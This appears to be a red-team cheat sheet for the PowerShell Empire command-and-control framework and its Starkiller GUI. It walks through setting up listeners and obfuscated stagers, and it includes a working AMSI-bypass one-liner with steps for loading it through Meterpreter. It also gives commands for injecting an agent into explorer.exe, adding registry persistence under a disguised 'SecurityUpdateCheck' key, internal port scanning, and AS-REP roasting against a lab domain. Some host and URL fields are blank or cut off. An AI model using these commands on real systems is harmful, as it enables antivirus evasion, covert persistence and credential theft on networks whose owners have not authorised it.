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Powershell Empire



  • Installing Empire
  • Non Kali OS
git clone --recursive
cd Empire
sudo ./setup/
  • Kali OS
sudo apt install powershell-empire
  • Installing Starkiller
  • Once Empire is installed we can install the GUI for Empire known as Starkiller.
cd /opt
chmod +x starkiller-0.0.0.AppImage

Starting Empire

  • Once both Empire and Starkiller are installed we can start both servers. Being by starting Empire with the instructions below.
cd /opt/Empire
./ps-empire server
./ps-empire client
  • Starting Starkiller
  • Once Empire is started follow the instructions below to start Starkiller.
cd /opt/Empire

Login to Starkiller

  • Default Credentials
  • Uri:
  • User: empireadmin
  • Pass: password123

Delete Stale Listeners

  • If you exit empire without disabling or killing all your listeners next time you start empire it will still show and not let you disable or kill it
  • open this file in a database browser
#find the stale listener in the listeners table
DELETE FROM listeners WHERE id=1;

Server Obsfucation

  • Change Invoke-Empire to Invoke-RandomStringHere in these files:

Listeners Overview

  • http - This is the standard listener that utilizes HTTP to listen on a specific port.
  • http_com - Uses the standard HTTP listener with an IE COM object.
  • http_foreign - Used to point to a different Empire server.
  • http_hop - Used for creating an external redirector using PHP.
  • http_mapi - Uses the standard HTTP listener with a MAPI COM object.
  • The next five commands all use variations of built out services or have unique features that make them different from other listeners.
  • meterpreter - Used to listen for Metasploit stagers.
  • onedrive - Utilizes OneDrive as the listening platform.
  • redirector - Used for creating pivots in a network.
  • dbx - Utilizes Dropbox as the listening platform.
  • http_malleable - Used alongside the malleable C2 profiles from BC-Security.

Creating a Listener

#select type
uselistener http
set Name l0
set BindIP
set Host
set Port 80
  • Configure your listener, the only two options you will need to change are the host IP and the host port.
  • HTTP listener
  • Name - Specify what name the listener shows up as in the listener menu.
  • Host - IP to connect back to.
  • Port - Port to listen on.
  • BindIP - IP to bind to (typically localhost /
  • The following options can be useful for bypassing detection techniques and creating more complex listeners.
set DefaultDelay 30
set DefaultJitter 0.0-1.0 
set DefaultLostLimit 10 #Number of missed checkins before exiting
  • DefaultProfile - Will allow you to specify the profile used or User-Agent.
  • Headers - Since this is an HTTP listener it will specify HTTP headers.
  • Launcher - What launcher to use for the listener this will be prefixed on the stager.

Stagers Overview

  • The stager is similar to a payload or reverse-shell that you would send to the target to get an agent back.
  • Empire has multiple parts to each stage to help identify each one. First is the platform this can include multi, OSx, and Windows. Second the stager type itself / launcher.
  • multi/launcher - A fairly universal stager that can be used for a variety of devices.
  • windows/launcher_bat - Windows Batch file
  • multi/bash - Basic Bash Stager
  • You can also use stagers for more specific applications similar to the listeners. These can be anything from macro code to ducky code for USB attacks.
  • windows/ducky - Ducky script for the USB Rubber Ducky for physical USB attacks.
  • windows/hta - HTA server an HTML application protocol that can be used to evade AV.
  • osx/applescript - Stager in AppleScript: Apple's own programming language.
  • osx/teensy - Similar to the rubber ducky is a small form factor micro-controller for physical attacks.

Generating a Stager

usestager multi/launcher
set Obfuscate True
set Listener l0
set StagerRetries 10 
set OutFile check.ps1
set Language Powershell #bash or python
  • Set the listener to the one you made in the previous task
  • The stager menu can come with various options depending on the stager selected as well as optional fields.
  • Base64 - Enable or disable stager encoding with base64.
  • SafeChecks - Enable or disable checks for the stager.
  • Some of the optional fields include ASMIBypass, Obfuscate, ETWBypass, etc.

Agents Overview

  • Agents are used within Starkiller similar to how you would interact with a normal shell or terminal.
  • Agents are color-coded and use icons to help distinguish Agent status. Below is an outline of the color and icon scheme
  • Red - User is no longer responding
  • Black - User is responding normally
  • User Icon - Normal user account
  • User Icon w/ Gear - System user account

Using Agents

  • Below you can see the basic layout of the Agent interaction menu and what capabilities an agent on a device has.
<figure><img src="" alt=""><figcaption></figcaption></figure>

Module Overview

  • Modules are used in Empire as a way of packaging tools and exploits to be easily used with agents.
  • We can take a look at a few useful ones for enumeration and privilege escalation outlined below:
  • Empire sorts the modules by the language used: PowerShell, python, external, and exfiltration as well as categories for modules you can find the categories below.
code execution
lateral movement
situational awareness 

Using Modules

  • Modules require no, to very little configuration
  • Below you can see the task to run Seatbelt being assigned then the output of the module being printed to the console window.
<figure><img src="" alt=""><figcaption></figcaption></figure>
  • Because all modules are run remotely from a task and agent this means that we do not have to worry about Anti-Virus or other possible detections.

Plugins Overview

  • Plugins are an extension of the base set of modules that Empire comes with. You can easily download and use community-made plugins to extend the use of Empire.
  • To use a plugin, transfer a file to the /plugins directory of Empire. As an example of how to use plugins, we will be using the socks server plugin made by BC-Security, you can download it here.

Using Plugins

  • Transfer or clone the plugin that you want to use into the plugins directory for Empire.
<figure><img src="" alt=""><figcaption></figcaption></figure>
  • After Empire version 3.4.0, Empire automatically loads plugins into the server. If the plugin is not already running you - Can use the plugin command to load the plugin for use.
plugin <plugin name>
<figure><img src="" alt=""><figcaption></figcaption></figure>
  • You can run plugins using the start and stop commands. Depending on the plugin the flags / parameters can change for each.
start <plugin name>
stop <plugin name>
<figure><img src="" alt=""><figcaption></figcaption></figure>

Great Modules for AD

usemodule powershell/situational_awareness/network/get_spn
set Search MSSQL*
  • Get the SPNs from LDAP output or from bloodhound

Empire Agent Obfuscation / Meterpreter/Empire Tandem

  • This assumes an active meterpreter session on a remote host
make normal http listener (host/bind ip/port/name) are the main four. 
Now for the agent do:
set Launcher powershell -enc
usestager multi/launcher
set Bypasses None <-- we're adding the custom AMSI bypass
set Listener http 
  • AMSI Bypass
$s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true);
copy the base64 encoded output, decode it locally. 
There will be the string:
If($PSVersionTable.PSVersion.Major -ge 3){};

put the AMSI bypass above in the {}
save as a .ps1 file locally on kali

go to meterpreter and run:
load powershell
powershell_import /path/to/file/created.ps1

Empire Internal Host Scanning

usemodule powershell/situational_awareness/network/portscan
set Hosts
set Ports 22,80,443,445,3389
set SkipDiscovery True
set PingOnly False
set ReadableOut scan.nmap

Empire PSInject Agent into another process

// use explorer.exe 528 (for example)
set Agent <Current Empire Agent>
set Bypasses <up to you>
set Listener http
set ProcId 528

Empire Registry Persistence

usemodule powershell/persistence/userland/registry
set Agent <AGENT_ID>
set Listener http
set KeyName SecurityUpdateCheck
set RegPath HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\GameDVR\\SecurityDebugCheck
set Obfuscate True

Empire AS-REP Roast

usemodule rubeus
┌Record Options────────────────────────────────┬──────────┬────────────────────────────────────┐
│ Name    │ Value                              │ Required │ Description                        │
│ Agent   │ R5CT8N7S                           │ True     │ Agent to run module on.            │
│ Command │ asreproast                         │ False    │ Use available Rubeus commands as a │
│         │ /spn:ldap/dc01.rastalabs.local/ras │          │ one-liner.                         │
│         │ talabs.local                       │          │                                    │